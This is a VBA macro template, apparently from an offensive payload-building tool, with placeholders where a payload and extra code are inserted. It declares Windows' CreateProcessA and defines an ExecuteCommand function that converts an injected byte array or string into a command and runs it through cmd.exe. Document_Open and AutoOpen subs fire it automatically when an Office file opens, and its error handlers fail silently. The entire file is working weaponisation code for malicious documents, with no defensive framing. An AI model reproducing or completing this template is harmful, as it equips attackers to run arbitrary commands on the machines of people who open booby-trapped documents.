//####DEFINE####
Private Declare PtrSafe Function CreateProcessA Lib "kernel32" ( _
    ByVal lpApplicationName As String, _
    ByVal lpCommandLine As String, _
    ByVal lpProcessAttributes As LongPtr, _
    ByVal lpThreadAttributes As LongPtr, _
    ByVal bInheritHandles As Long, _
    ByVal dwCreationFlags As Long, _
    ByVal lpEnvironment As LongPtr, _
    ByVal lpCurrentDirectory As String, _
    lpStartupInfo As STARTUPINFO, _
    lpProcessInformation As PROCESS_INFORMATION _
) As Long

Private Type STARTUPINFO
    cb As Long
    lpReserved As String
    lpDesktop As String
    lpTitle As String
    dwX As Long
    dwY As Long
    dwXSize As Long
    dwYSize As Long
    dwXCountChars As Long
    dwYCountChars As Long
    dwFillAttribute As Long
    dwFlags As Long
    wShowWindow As Integer
    cbReserved2 As Integer
    lpReserved2 As LongPtr
    hStdInput As LongPtr
    hStdOutput As LongPtr
    hStdError As LongPtr
End Type

Private Type PROCESS_INFORMATION
    hProcess As LongPtr
    hThread As LongPtr
    dwProcessId As Long
    dwThreadId As Long
End Type

//####CODE####

Function ExecuteCommand()
    On Error GoTo ErrorHandler
    
    Dim buf As Variant
    buf = ####SHELLCODE####
    
    //####CALL####
    
    Dim command As String
    
    ' Check if input is already a string
    If VarType(buf) = vbString Then
        command = buf
    Else
        ' Convert array to string
        command = ArrayToString(buf)
    End If
    
    ' Execute command using CreateProcess
    Dim si As STARTUPINFO
    Dim pi As PROCESS_INFORMATION
    Dim result As Long
    Dim cmdPath As String
    Dim fullCommand As String
    
    cmdPath = "C:\Windows\System32\cmd.exe"
    fullCommand = """" & cmdPath & """ /c " & command
    
    si.cb = Len(si)
    si.dwFlags = &H1
    si.wShowWindow = 1
    
    result = CreateProcessA(cmdPath, fullCommand, 0, 0, True, &H10, 0, vbNullString, si, pi)
    
    Exit Function

ErrorHandler:
    Exit Function
End Function

Private Function ArrayToString(arr As Variant) As String
    On Error GoTo ErrorHandler
    
    Dim result As String
    Dim i As Long
    
    result = ""
    For i = LBound(arr) To UBound(arr)
        result = result & Chr(arr(i))
    Next i
    
    ArrayToString = result
    Exit Function

ErrorHandler:
    ArrayToString = ""
End Function

Sub Document_Open()
    ExecuteCommand
End Sub

Sub AutoOpen()
    ExecuteCommand
End Sub